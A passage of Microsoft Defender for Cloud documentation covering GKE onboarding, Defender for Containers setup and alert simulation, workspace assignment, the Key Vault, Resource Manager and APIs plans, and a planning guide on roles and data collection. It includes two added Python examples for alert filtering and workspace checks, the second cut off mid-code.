3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant GCP project. 
5. Select the Next: Select plans button.


6. Ensure that the Containers plan is toggled to On. 




7. Select the Copy button. 


(Screenshot of the GCP connector's Select plans and Configure access tabs: the Containers plan provides real-time threat protection for your GKE clusters and generates alerts for suspicious activities; Defender for Cloud will get write access to GKE control plane configuration and will create and manage its own resources in your GCP account. The Configure access tab offers Copy script to GCP Cloud Shell: a Cloud Shell template to configure access on the GCP side is created according to the plans selected in the previous tab.)


8. Select the GCP Cloud Shell button. 
9. Paste the script into the Cloud Shell terminal, and run it. 


The connector will update after the script executes. This process can take up to 6-8 hours to complete.


10. Select Next: Review and generate.


11. Select Update. 


Note

To enable or disable individual Defender for Containers capabilities, either globally or for specific resources, see How to enable Microsoft Defender for Containers components.


Deploy the solution to specific clusters 


If you set any of the default auto provisioning configurations to Off during the GCP connector onboarding process, or afterwards, you need to manually install Azure Arc-enabled Kubernetes, the Defender agent, and Azure Policy for Kubernetes on each of your GKE clusters to get the full security value out of Defender for Containers.


There are two dedicated Defender for Cloud recommendations you can use to install the extensions (and Arc if necessary):

- GKE clusters should have Microsoft Defender's extension for Azure Arc installed
- GKE clusters should have the Azure Policy extension installed


Note 


When installing Arc extensions, you must verify that the GCP project provided is 
identical to the one in the relevant connector. 


To deploy the solution to specific clusters: 
1. Sign in to the Azure portal. 


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Recommendations. 


4. From Defender for Cloud's Recommendations page, search for each one of the 
recommendations above by name. 


5. Select an unhealthy GKE cluster. 


Important 


You must select the clusters one at a time. 

Don't select the clusters by their hyperlinked names: select anywhere else in 
the relevant row. 


6. Select the name of the unhealthy resource. 


7. Select Fix. 


[Screenshot: the recommendation page for GKE clusters should have Microsoft Defender's extension for Azure Arc installed, showing severity High, a freshness interval of 6 hours, the description (Microsoft Defender's cluster extension provides security capabilities and works with Azure Arc-enabled Kubernetes), and the Affected resources tab with unhealthy and healthy GKE clusters and the Fix and Trigger logic app buttons.] 


8. Defender for Cloud generates a script in the language of your choice: 


• For Linux, select Bash. 
• For Windows, select PowerShell. 


9. Select Download remediation logic. 
10. Run the generated script on your cluster. 


11. Repeat steps 3 through 10 for the second recommendation. 


Next steps 


• For advanced enablement features for Defender for Containers, see the Enable 
Microsoft Defender for Containers page. 

• Overview of Microsoft Defender for Containers. 


How to enable Microsoft Defender for Containers components 


Article • 08/13/2023 


Microsoft Defender for Containers is the cloud-native solution for securing your 
containers. 


Defender for Containers protects your clusters whether they're running in: 


• Azure Kubernetes Service (AKS) - Microsoft's managed service for developing, 
deploying, and managing containerized applications. 

• Amazon Elastic Kubernetes Service (EKS) in a connected Amazon Web Services 
(AWS) account - Amazon's managed service for running Kubernetes on AWS 
without needing to install, operate, and maintain your own Kubernetes control 
plane or nodes. 

• Google Kubernetes Engine (GKE) in a connected Google Cloud Platform (GCP) 
project - Google's managed environment for deploying, managing, and scaling 
applications using GCP infrastructure. 

• Other Kubernetes distributions (using Azure Arc-enabled Kubernetes) - Cloud 
Native Computing Foundation (CNCF) certified Kubernetes clusters hosted on-premises 
or on IaaS. For more information, see the On-prem/IaaS (Arc) section of 
Supported features by environment. 


Learn about this plan in Overview of Microsoft Defender for Containers. 
You can first learn how to connect and protect your containers in these articles: 


• Protect your Azure containers with Defender for Containers 

• Protect your on-premises Kubernetes clusters with Defender for Containers 

• Protect your Amazon Web Service (AWS) accounts containers with Defender for 
Containers 

• Protect your Google Cloud Platform (GCP) project containers with Defender for 
Containers 


You can also learn more by watching these videos from the Defender for Cloud in the 
Field video series: 


• Microsoft Defender for Containers in a multicloud environment 
• Protect Containers in GCP with Defender for Containers 


Network requirements 


Validate that the following endpoints are configured for outbound access so that the 
Defender agent can connect to Microsoft Defender for Cloud to send security data and 
events: 


See the required FQDN/application rules for Microsoft Defender for Containers. 


By default, AKS clusters have unrestricted outbound (egress) internet access. 


Enable the plan 


To enable the plan: 


1. From Defender for Cloud's menu, open the Settings page and select the relevant 
subscription. 


2. In the Defender plans page, select Defender for Containers and select Settings. 


[Screenshot: Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans.] 


Tip 


If the subscription already has Defender for Kubernetes and/or Defender for 
container registries enabled, an update notice is shown. Otherwise, the only 
option will be Defender for Containers. 


[Screenshot: the Defender plans list, showing Containers (2 container registries; 24 Kubernetes cores) alongside the deprecated Kubernetes and Container registries plans, each marked Update available.] 


3. Turn the relevant component on to enable it. 


[Screenshot: the Settings & monitoring page for the Containers plan. When you enable an extension, it is installed on any new or existing resource by assigning a security policy. Components listed: Defender DaemonSet - deployed to each worker node, collects security-related data and sends it to Defender for analysis; required for the runtime protections and security capabilities provided by Defender for Containers; on Azure Kubernetes Service (AKS) it is deployed as a Security Profile, on Arc clusters as an Arc extension. Azure Policy for Kubernetes - required to apply at-scale auditing, enforcements and safeguards on clusters; on AKS it is deployed as an add-on, on Arc clusters as an extension.] 


Note 


When you turn off Defender for Containers, the components are set to off and 
are not deployed to any more containers, but they are not removed from 
containers that they are already installed on. 


By default, when enabling the plan through the Azure portal, Microsoft Defender for 
Containers is configured to automatically install the required components to provide the 
protections offered by the plan, including the assignment of a default workspace. 


You can assign a custom workspace through Azure Policy. 


If you don't want to automatically install the Defender for Containers monitoring 
components on your container resources, select Edit configuration for the Containers 
plan. Then, in the Settings & monitoring page, turn off automatic installation for each 
component. 


In addition, you can modify this configuration from the Defender plans page. 


If you disable the automatic installation of any component, you can easily deploy the 
component to one or more clusters using the appropriate recommendation: 


• Policy Add-on for Kubernetes - Azure Kubernetes Service clusters should have the 
Azure Policy Add-on for Kubernetes installed 

• Azure Kubernetes Service profile - Azure Kubernetes Service clusters should have 
Defender profile enabled 

• Azure Arc-enabled Kubernetes Defender extension - Azure Arc-enabled 
Kubernetes clusters should have the Defender extension installed 

• Azure Arc-enabled Kubernetes Policy extension - Azure Arc-enabled Kubernetes 
clusters should have the Azure Policy extension installed 


Note 


Microsoft Defender for Containers is configured to defend all of your clouds 
automatically when you install all of the required prerequisites and enable all 
of the automatic installation capabilities. 


If you choose to disable all of the automatic installation configuration options, 
no agents or components will be deployed to your clusters. Protection will be 
limited to the agentless features only. Learn which features are agentless in 
the availability section for Defender for Containers. 


Learn more about the roles used to provision Defender for Containers extensions. 


Deploy the Defender agent 


You can enable the Defender for Containers plan and deploy all of the relevant 
components from the Azure portal, the REST API, or with a Resource Manager template. 
For detailed steps, select the relevant tab. 


Once the Defender agent has been deployed, a default workspace will be automatically 
assigned. You can assign a custom workspace in place of the default workspace through 
Azure Policy. 


Note 


The Defender agent is deployed to each node to provide the runtime protections 
and collect signals from those nodes using eBPF technology. 


Azure portal 


Use the Fix button from the Defender for Cloud recommendation 


A streamlined, frictionless process lets you use the Azure portal pages to enable 
the Defender for Cloud plan and set up auto provisioning of all the necessary 
components for defending your Kubernetes clusters at scale. 
A dedicated Defender for Cloud recommendation provides: 


• Visibility about which of your clusters has the Defender agent deployed 
• A Fix button to deploy it to those clusters without the agent 


1. From Microsoft Defender for Cloud's recommendations page, open the 
Enable enhanced security security control. 


2. Use the filter to find the recommendation named Azure Kubernetes Service 
clusters should have Defender profile enabled. 


Tip 


Notice the Fix icon in the actions column. 


3. Select the clusters to see the details of the healthy and unhealthy resources - 
clusters with and without the agent. 


4. From the unhealthy resources list, select a cluster and select Remediate to 
open the pane with the remediation confirmation. 


5. Select Fix X resources. 


Simulate security alerts from Microsoft 
Defender for Containers 


A full list of supported alerts is available in the reference table of all Defender for Cloud 


security alerts. 


1. To simulate a security alert, run the following command from the cluster: 


Console 


kubectl get pods --namespace=asc-alerttest-662jf1i039n 


The expected response is No resource found. 


Within 30 minutes, Defender for Cloud detects this activity and triggers a security 
alert. 


2. In the Azure portal, open Microsoft Defender for Cloud's security alerts page and 
look for the alert on the relevant resource: 


[Screenshot: Home > Microsoft Defender for Cloud | Security alerts, listing alerts for the Arc-enabled Kubernetes cluster ASC-Arc-K8S-demo dated 01/18/21, 01:16 PM, including Role binding to the cluster-admin role detected (severity Low, MITRE ATT&CK tactic Persistence), with the alert details pane showing the affected resource and subscription.] 
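Step 2 above is a manual check in the portal. As an added example (not Microsoft's code and not part of this article), the following Python confirms the same thing programmatically: it filters a list of alerts in the JSON shape returned by `az security alert list -o json`, keeps only active alerts on the cluster the test command ran against that were generated inside the 30-minute window the article gives, and also wraps the `kubectl get pods` test command from step 1. The field names (alertDisplayName, compromisedEntity, severity, status, timeGeneratedUtc) and the CLI's `--resource-group` filter are assumptions about the Defender for Cloud alerts schema; the sample alert list is constructed, modelled on the alerts in the screenshot.

```python
"""Verify that the Defender for Containers simulation produced an alert.

Added example, not Microsoft's code. Field names follow the Defender for Cloud
alerts schema as assumed here; SAMPLE_ALERTS is constructed for this example.
"""
import json
import subprocess
from datetime import datetime, timedelta, timezone

# Namespace used by the article's test command.
SIMULATION_NAMESPACE = "asc-alerttest-662jf1i039n"

SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}

# Constructed sample, shaped like `az security alert list -o json` output (assumed schema).
SAMPLE_ALERTS = json.loads("""
[
  {"alertDisplayName": "Role binding to the cluster-admin role detected",
   "compromisedEntity": "ASC-Arc-K8S-demo", "severity": "Low", "status": "Active",
   "intent": "Persistence", "timeGeneratedUtc": "2021-01-18T13:16:00Z"},
  {"alertDisplayName": "Constructed alert on a different cluster",
   "compromisedEntity": "other-cluster", "severity": "Medium", "status": "Active",
   "intent": "Execution", "timeGeneratedUtc": "2021-01-18T13:20:00Z"},
  {"alertDisplayName": "Constructed alert that was already dismissed",
   "compromisedEntity": "ASC-Arc-K8S-demo", "severity": "Medium", "status": "Dismissed",
   "intent": "Execution", "timeGeneratedUtc": "2021-01-18T13:18:00Z"},
  {"alertDisplayName": "Constructed alert from the previous day",
   "compromisedEntity": "ASC-Arc-K8S-demo", "severity": "High", "status": "Active",
   "intent": "Persistence", "timeGeneratedUtc": "2021-01-17T09:00:00Z"}
]
""")


def parse_utc(ts: str) -> datetime:
    """Parse an ISO-8601 timestamp such as 2021-01-18T13:16:00Z into an aware UTC datetime."""
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def alerts_for_resource(alerts, resource_name, since, min_severity="Informational"):
    """Active alerts on resource_name generated at or after `since`, newest first.

    Dismissed/resolved alerts and alerts below min_severity are dropped.
    """
    floor = SEVERITY_RANK[min_severity]
    hits = [
        a for a in alerts
        if a.get("compromisedEntity") == resource_name
        and a.get("status") == "Active"
        and SEVERITY_RANK.get(a.get("severity"), -1) >= floor
        and parse_utc(a["timeGeneratedUtc"]) >= since
    ]
    return sorted(hits, key=lambda a: parse_utc(a["timeGeneratedUtc"]), reverse=True)


def simulation_detected(alerts, resource_name, started_at, window_minutes=30):
    """True when an active alert on the cluster arrived within the detection window
    (the article states up to 30 minutes after the test command)."""
    window_end = started_at + timedelta(minutes=window_minutes)
    return any(
        started_at <= parse_utc(a["timeGeneratedUtc"]) <= window_end
        for a in alerts_for_resource(alerts, resource_name, started_at)
    )


def run_simulation(namespace=SIMULATION_NAMESPACE):
    """Run the article's test command against the current kubectl context and
    return its combined output (kubectl reports that no resources were found)."""
    proc = subprocess.run(["kubectl", "get", "pods", f"--namespace={namespace}"],
                          capture_output=True, text=True)
    return (proc.stdout + proc.stderr).strip()


def load_alerts_from_cli(resource_group=None):
    """Fetch alerts with the Azure CLI (assumed command shape; requires `az login`)."""
    cmd = ["az", "security", "alert", "list", "-o", "json"]
    if resource_group:
        cmd += ["--resource-group", resource_group]
    return json.loads(subprocess.check_output(cmd, text=True))


if __name__ == "__main__":
    started = parse_utc("2021-01-18T13:00:00Z")  # when the test command was run (constructed)
    for a in alerts_for_resource(SAMPLE_ALERTS, "ASC-Arc-K8S-demo", started):
        print(a["severity"], a["alertDisplayName"], a["timeGeneratedUtc"])
    print("detected:", simulation_detected(SAMPLE_ALERTS, "ASC-Arc-K8S-demo", started))
```

In practice, record the time just before running the test command, wait for the detection window, then call `load_alerts_from_cli()` and pass the result to `simulation_detected()` with that timestamp; the severity floor in `alerts_for_resource()` lets the same filter serve as a lightweight triage query once the real alerts start arriving.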


Default Log Analytics workspace for AKS 


The Log Analytics workspace is used by the Defender agent as a data pipeline to send 
data from the cluster to Defender for Cloud without retaining any data in the Log 
Analytics workspace itself. As a result, users won't be billed in this use case. 


The Defender agent uses a default Log Analytics workspace. If you don't already have a 
default Log Analytics workspace, Defender for Cloud will create a new resource group 
and default workspace when the Defender agent is installed. The default workspace is 
created based on your region. 


The naming convention for the default Log Analytics workspace and resource group is: 

• Workspace: DefaultWorkspace-[subscription-ID]-[geo] 

• Resource Group: DefaultResourceGroup-[geo] 


Assign a custom workspace 


When you enable the auto-provision option, a default workspace will be automatically 
assigned. You can assign a custom workspace through Azure Policy. 


To check if you have a workspace assigned: 

1. Sign in to the Azure portal. 


2. Search for and select Policy. 


[Screenshot: Azure portal search results for Policy.] 


3. Select Definitions. 


4. Search for policy ID 64def556-fbad-4622-930e-72d1d5589bf5. 


[Screenshot: the Policy | Definitions page.] 


5. Select Configure Azure Kubernetes Service clusters to enable Defender profile. 


6. Select Assignment. 


[Screenshot: the Configure Azure Kubernetes Service clusters to enable Defender profile policy definition, with Available Effects DeployIfNotExists, Disabled; Category Kubernetes; Type Built-in; and the Assignments (2) tab listing the Defender for Containers provisioning AKS Security Profile assignments.] 


7. Follow the Create a new assignment with custom workspace steps if the policy 
hasn't yet been assigned to the relevant scope. Or, follow the Update assignment 
with custom workspace steps if the policy is already assigned and you want to 
change it to use a custom workspace. 


Create a new assignment with custom workspace 


If the policy hasn't been assigned, you'll see Assignments (0). 


[Screenshot: the [Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile policy definition showing Assignments (0).] 


To assign a custom workspace: 


1. Select Assign. 


2. In the Parameters tab, deselect the Only show parameters that need input or 
review option. 


3. Select a LogAnalyticsWorkspaceResourceId from the dropdown menu. 


[Screenshot: the Parameters tab of the Defender for Containers provisioning AKS Security Profile assignment, with the Only show parameters that need input or review option cleared and the LogAnalyticsWorkspaceResourceId dropdown visible.] 


4. Select Review + create. 


5. Select Create. 


Update assignment with custom workspace 


If the policy has already been assigned to a workspace, you'll see Assignments (1). 


[Screenshot: the [Preview]: Configure Azure Kubernetes Service clusters to enable Defender profile policy definition showing Assignments (1).] 


Note 


If you have more than one subscription the number may be higher. 


To assign a custom workspace: 


1. Select the relevant assignment. 


[Screenshot: the policy definition page with its assignment list.] 


2. Select Edit assignment. 


3. In the Parameters tab, deselect the Only show parameters that need input or 
review option. 


4. Select a LogAnalyticsWorkspaceResourceId from the dropdown menu. 


[Screenshot: the Parameters tab of the Defender for Containers provisioning AKS Security Profile assignment, with the Only show parameters that need input or review option cleared and the LogAnalyticsWorkspaceResourceId dropdown visible.] 


5. Select Review + save. 


6. Select Save. 


Remove the Defender agent 


To remove this - or any - Defender for Cloud extension, it's not enough to turn off auto 
provisioning: 


• Enabling auto provisioning potentially impacts existing and future machines. 
• Disabling auto provisioning for an extension only affects future machines - 
nothing is uninstalled by disabling auto provisioning. 


Nevertheless, to ensure the Defender for Containers components aren't automatically 
provisioned to your resources from now on, disable auto provisioning of the extensions 
as explained in Configure auto provisioning for agents and extensions from Microsoft 
Defender for Cloud. 


You can remove the extension using the REST API or a Resource Manager template as 
explained in the tabs below. 


REST API 


Use REST API to remove the Defender agent from AKS 
To remove the extension using the REST API, run the following PUT command: 


HTTP 


https://management.azure.com/subscriptions/{{SubscriptionId}}/resourcegroups/{{ResourceGroup}}/providers/Microsoft.ContainerService/managedClusters/{{ClusterName}}?api-version={{ApiVersion}} 


Name             Description                          Mandatory 
SubscriptionId   Cluster's subscription ID            Yes 
ResourceGroup    Cluster's resource group             Yes 
ClusterName      Cluster's name                       Yes 
ApiVersion       API version, must be >= 2022-06-01   Yes 


Request body: 


HTTP 


{ 
  "location": "{{Location}}", 
  "properties": { 
    "securityProfile": { 
      "defender": { 
        "securityMonitoring": { 
          "enabled": false 
        } 
      } 
    } 
  } 
} 

Request body parameters: 


Name                                                             Description                                                                                Mandatory 
location                                                         Cluster's location                                                                         Yes 
properties.securityProfile.defender.securityMonitoring.enabled   Determines whether to enable or disable Microsoft Defender for Containers on the cluster   Yes 


Learn more 


You can check out the following blogs: 


• Protect your Google Cloud workloads with Microsoft Defender for Cloud 

• Introducing Microsoft Defender for Containers 

• A new name for multicloud security: Microsoft Defender for Cloud 


Next steps 


Now that you enabled Defender for Containers, you can: 


• Scan your ACR images for vulnerabilities 
• Scan your Amazon AWS ECR images for vulnerabilities 

• Check out common questions about Defender for Containers. 


Protect your key vaults with Defender for Key Vault 


Article • 07/05/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection for 
Azure Key Vault, providing an additional layer of security intelligence. 


Learn more about Microsoft Defender for Key Vault. 


You can learn more about Defender for Key Vault's pricing on the pricing page. 


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription. 

• You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Key Vault plan 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 
monitoring systems. 

To enable the Defender for Key Vault plan on your subscription: 

1. Sign in to the Azure portal. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 
5. On the Defender plans page, toggle the Key Vault plan to On. 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Key Vault 




Protect your resources with Defender for Resource Manager 


Article • 07/05/2023 


Azure Resource Manager is the deployment and management service for Azure. It 
provides a management layer that enables you to create, update, and delete resources 
in your Azure account. You use management features, like access control, locks, and 
tags, to secure and organize your resources after deployment. 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


Learn more about Microsoft Defender for Resource Manager. 


You can learn more about Defender for Resource Manager's pricing on the pricing 
page. 


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription. 

• You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Resource Manager plan 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


To enable the Defender for Resource Manager plan on your subscription: 

1. Sign in to the Azure portal. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 
5. On the Defender plans page, toggle the Resource Manager plan to On. 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Resource Manager 


Protect your APIs with Defender for APIs (Preview) 


Article • 06/29/2023 


Defender for APIs in Microsoft Defender for Cloud offers full lifecycle protection, 
detection, and response coverage for APIs. 


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Learn more about the Microsoft Defender for APIs plan in the Microsoft Defender for 
Cloud. Defender for APIs is currently in preview. 


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription. 

• You must enable Microsoft Defender for Cloud on your Azure subscription. 

• Review Defender for APIs support, permissions, and requirements before you 
begin deployment. 

• You enable Defender for APIs at the subscription level. 

• Ensure that APIs you want to secure are published in Azure API Management. 
Follow these instructions to set up Azure API Management. 

Note 


This article describes how to enable and onboard the Defender for APIs plan in the 
Defender for Cloud portal. Alternately, you can enable Defender for APIs within an 
API Management instance in the Azure portal. 


Enable the Defender for APIs plan 


1. Sign in to the portal, and in Defender for Cloud, select Environment settings. 


2. Select the subscription that contains the managed APIs that you want to protect. 


3. In the APIs plan, select On. Then select Save. 


[Screenshot: the Settings | Defender plans page, showing the Cloud Security Posture Management and Cloud Workload Protection (CWP) plan groups with the APIs plan.] 


4. Select Save. 


Note 


After enabling Defender for APIs, onboarded APIs take up to 50 minutes to appear 
in the Recommendations tab. Security insights are available in the Workload 
protections > API security dashboard within 40 minutes of onboarding. 


Onboard APIs 


1. In the Defender for Cloud portal, select Recommendations. 
2. Search for Defender for APIs. 


3. Under Enable enhanced security features, select the security recommendation 
Azure API Management APIs should be onboarded to Defender for APIs. 


4. In the recommendation page, you can review the recommendation severity, 
update interval, description, and remediation steps. 


5. Review the resources in scope for the recommendations: 


• Unhealthy resources: Resources that aren't onboarded to Defender for APIs. 
• Healthy resources: API resources that are onboarded to Defender for APIs. 
• Not applicable resources: API resources that aren't applicable for protection. 


6. In Unhealthy resources, select the APIs that you want to protect with Defender for 
APIs. 


7. Select Fix. 


8. In Fixing resources, review the selected APIs, and select Fix resources. 


[Screenshot: the Fixing resources pane for Azure API Management APIs should be onboarded to Defender for APIs (severity High, freshness interval 30 min). By selecting Fix on the selected API collections, these API collections will be onboarded to Defender for APIs and will be monitored for security coverage. The Affected resources tab lists Unhealthy resources (2), Healthy resources (4) and Not applicable resources (0).] 


9. Verify that remediation was successful. 


[Screenshot: the recommendation page after remediation, with the notification Remediation successful (Azure API Management APIs should be onboarded to Defender for APIs). You might need to refresh the page to see the updated Affected resources tabs.] 


Track onboarded API resources 


After onboarding the API resources, you can track their status in the Defender for Cloud 
portal > Workload protections > API security. 


[Screenshot: Home > Microsoft Defender for Cloud | Workload protections for the CyberSecSOC subscription, showing coverage, the security alerts chart, and the Advanced protection tiles, including API security.] 


Next steps 


Review API threats and security posture. 


Planning and operations guide 


Article • 02/27/2023 


This guide is for information technology (IT) professionals, IT architects, information 
security analysts, and cloud administrators planning to use Defender for Cloud. 


Planning guide 


This guide provides the background for how Defender for Cloud fits into your 
organization's security requirements and cloud management model. It's important to 
understand how different individuals or teams in your organization use the service to 
meet secure development and operations, monitoring, governance, and incident 
response needs. The key areas to consider when planning to use Defender for Cloud are: 


• Security Roles and Access Controls 
• Security Policies and Recommendations 
• Data Collection and Storage 
• Onboarding non-Azure resources 
• Ongoing Security Monitoring 
• Incident Response 


In the next section, you'll learn how to plan for each one of those areas and apply those 
recommendations based on your requirements. 


Note 


Read Defender for Cloud common questions for a list of common questions that 
can also be useful during the designing and planning phase. 


Security roles and access controls 


Depending on the size and structure of your organization, multiple individuals and 
teams may use Defender for Cloud to perform different security-related tasks. In the 
following diagram, you have an example of fictitious personas and their respective roles 
and security responsibilities: 


[Diagram: fictitious personas and their security responsibilities: Ellen (CISO/CIO), David (IT Security), Judy (Security Ops), Sam (Security Analyst) and the Cloud Workload Owner; Security Ops is sometimes performed by a Managed Security Provider. The responsibilities are listed in the text below.] 


Defender for Cloud enables these individuals to meet these various responsibilities. For
example:

Jeff (Workload Owner)
• Manages a cloud workload and its related resources.
• Responsible for implementing and maintaining protections in accordance with
company security policy.

Ellen (CISO/CIO)
• Responsible for all aspects of security for the company.
• Wants to understand the company's security posture across cloud workloads.
• Needs to be informed of major attacks and risks.

David (IT Security)
• Sets company security policies to ensure the appropriate protections are in place.
• Monitors compliance with policies.
• Generates reports for leadership or auditors.

Judy (Security Operations)
• Monitors and responds to security alerts at any time.
• Escalates to Cloud Workload Owner or IT Security Analyst.

Sam (Security Analyst)
• Investigates attacks.
• Works with Cloud Workload Owner to apply remediation.


Defender for Cloud uses Azure role-based access control (Azure RBAC), which provides
built-in roles that can be assigned to users, groups, and services in Azure. When a user
opens Defender for Cloud, they only see information related to resources they have
access to. That means the user must be assigned the Owner, Contributor, or Reader role
on the subscription or resource group that the resource belongs to. In addition to these
roles, there are two roles specific to Defender for Cloud:


• Security Reader: a user in this role can view only Defender for Cloud configurations,
which include recommendations, alerts, policy, and health, but can't make changes.

• Security Admin: the same as Security Reader, but can also update the security policy
and dismiss recommendations and alerts.


The personas explained in the previous diagram need these Azure RBAC roles:

Jeff (Workload Owner)
• Resource Group Owner/Contributor.

Ellen (CISO/CIO)
• Subscription Owner/Contributor or Security Admin.

David (IT Security)
• Subscription Owner/Contributor or Security Admin.

Judy (Security Operations)
• Subscription Reader or Security Reader to view alerts.
• Subscription Owner/Contributor or Security Admin required to dismiss alerts.

Sam (Security Analyst)
• Subscription Reader to view alerts.
• Subscription Owner/Contributor required to dismiss alerts.
• Access to the workspace may be required.


Some other important information to consider:

• Only subscription Owners/Contributors and Security Admins can edit a security
policy.
• Only subscription and resource group Owners and Contributors can apply security
recommendations for a resource.


When planning access control using Azure RBAC for Defender for Cloud, make sure you
understand who in your organization needs access to Defender for Cloud and the tasks
they'll perform. Then you can configure Azure RBAC properly.


Note


We recommend that you assign the least permissive role needed for users to 
complete their tasks. For example, users who only need to view information about 
the security state of resources but not take action, such as applying 
recommendations or editing policies, should be assigned the Reader role. 


Security policies and recommendations 


A security policy defines the desired configuration of your workloads and helps ensure 
compliance with company or regulatory security requirements. In Defender for Cloud, 
you can define policies for your Azure subscriptions, which can be tailored to the type of 
workload or the sensitivity of data. 


Defender for Cloud policies contain the following components:

• Data collection: agent provisioning and data collection settings.
• Security policy: an Azure Policy that determines which controls are monitored and
recommended by Defender for Cloud. You can also use Azure Policy to create new
definitions, define more policies, and assign policies across management groups.
• Email notifications: security contacts and notification settings.
• Pricing tier: with or without Microsoft Defender for Cloud's Defender plans, which
determine which Defender for Cloud features are available for resources in scope
(can be specified for subscriptions and workspaces using the API).


Note


Specifying a security contact ensures that Azure can reach the right person in your 
organization if a security incident occurs. Read Provide security contact details in 
Defender for Cloud for more information on how to enable this recommendation. 


Security policy definitions and recommendations


Defender for Cloud automatically creates a default security policy for each of your Azure 
subscriptions. You can edit the policy in Defender for Cloud or use Azure Policy to create 
new definitions, define more policies, and assign policies across management groups. 
Management groups can represent the entire organization or a business unit within the 
organization. You can monitor policy compliance across these management groups. 


Before configuring security policies, review each of the security recommendations: 


• See if these policies are appropriate for your various subscriptions and resource
groups.
• Understand what actions address the security recommendations.
• Determine who in your organization is responsible for monitoring and remediating
new recommendations.


Data collection and storage 


Defender for Cloud uses the Log Analytics agent and the Azure Monitor Agent to collect 
security data from your virtual machines. Data collected from this agent is stored in your 
Log Analytics workspaces. 


Agent 


When automatic provisioning is enabled in the security policy, the data collection agent 
is installed on all supported Azure VMs and any new supported VMs that are created. If 
the VM or computer already has the Log Analytics agent installed, Defender for Cloud 
uses the current installed agent. The agent's process is designed to be non-invasive and 
have minimal effect on VM performance. 


If at some point you want to disable Data Collection, you can turn it off in the security 
policy. However, because the Log Analytics agent may be used by other Azure 
management and monitoring services, the agent won't be uninstalled automatically 
when you turn off data collection in Defender for Cloud. You can manually uninstall the 
agent if needed. 


Note


To find a list of supported VMs, read the Defender for Cloud common questions. 


Workspace 


A workspace is an Azure resource that serves as a container for data. You or other 
members of your organization might use multiple workspaces to manage different sets 
of data that is collected from all or portions of your IT infrastructure. 


Data collected from the Log Analytics agent can be stored in an existing Log Analytics
workspace associated with your Azure subscription or a new workspace.


In the Azure portal, you can browse to see a list of your Log Analytics workspaces, 
including any created by Defender for Cloud. A related resource group is created for 
new workspaces. Resources are created according to this naming convention: 


• Workspace: DefaultWorkspace-[subscription-ID]-[geo]
• Resource Group: DefaultResourceGroup-[geo]


For workspaces created by Defender for Cloud, data is retained for 30 days. For existing 
workspaces, retention is based on the workspace pricing tier. If you want, you can also 
use an existing workspace. 


If your agent reports to a workspace other than the default workspace, any Defender for 
Cloud Defender plans that you've enabled on the subscription should also be enabled 
on the workspace. 
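As an added check that is not part of the Microsoft documentation, the following Python script applies the naming convention above to a constructed workspace inventory and flags non-default workspaces that lack a Defender plan enabled on the subscription. The subscription ID is a placeholder, and the plan names are an assumption.

```python
import re
from dataclasses import dataclass

# Naming convention for the resources Defender for Cloud creates (from the planning guide).
DEFAULT_WS_RE = re.compile(r"^DefaultWorkspace-(?P<sub>[0-9a-fA-F-]{36})-(?P<geo>[A-Za-z]+)$")
DEFAULT_RG_RE = re.compile(r"^DefaultResourceGroup-(?P<geo>[A-Za-z]+)$")


@dataclass(frozen=True)
class Workspace:
    name: str
    resource_group: str
    subscription_id: str
    plans: frozenset  # Defender plans enabled on the workspace (constructed inventory)


def is_default_workspace(ws: Workspace) -> bool:
    """True only when the workspace and its resource group both follow the default
    convention, the embedded subscription ID is the workspace's own, and the geo matches."""
    ws_match = DEFAULT_WS_RE.match(ws.name)
    rg_match = DEFAULT_RG_RE.match(ws.resource_group)
    if not ws_match or not rg_match:
        return False
    return (ws_match.group("sub").lower() == ws.subscription_id.lower()
            and ws_match.group("geo").lower() == rg_match.group("geo").lower())


def plans_missing_on_workspace(subscription_plans, workspaces):
    """For each non-default workspace, list the plans enabled on the subscription that
    are not enabled on the workspace; an empty dict means nothing needs attention."""
    gaps = {}
    for ws in workspaces:
        if is_default_workspace(ws):
            continue  # default workspaces are created and managed by Defender for Cloud
        missing = frozenset(subscription_plans) - ws.plans
        if missing:
            gaps[ws.name] = sorted(missing)
    return gaps


# Constructed sample inventory. SUB is a placeholder subscription ID; the plan names
# for servers and SQL servers on machines are an assumption for this example.
SUB = "00000000-0000-0000-0000-000000000000"
SUB_PLANS = {"VirtualMachines", "SqlServerVirtualMachines"}
SAMPLE = [
    Workspace(f"DefaultWorkspace-{SUB}-EUS", "DefaultResourceGroup-EUS", SUB, frozenset()),
    Workspace("soc-central-law", "rg-soc", SUB, frozenset({"VirtualMachines"})),
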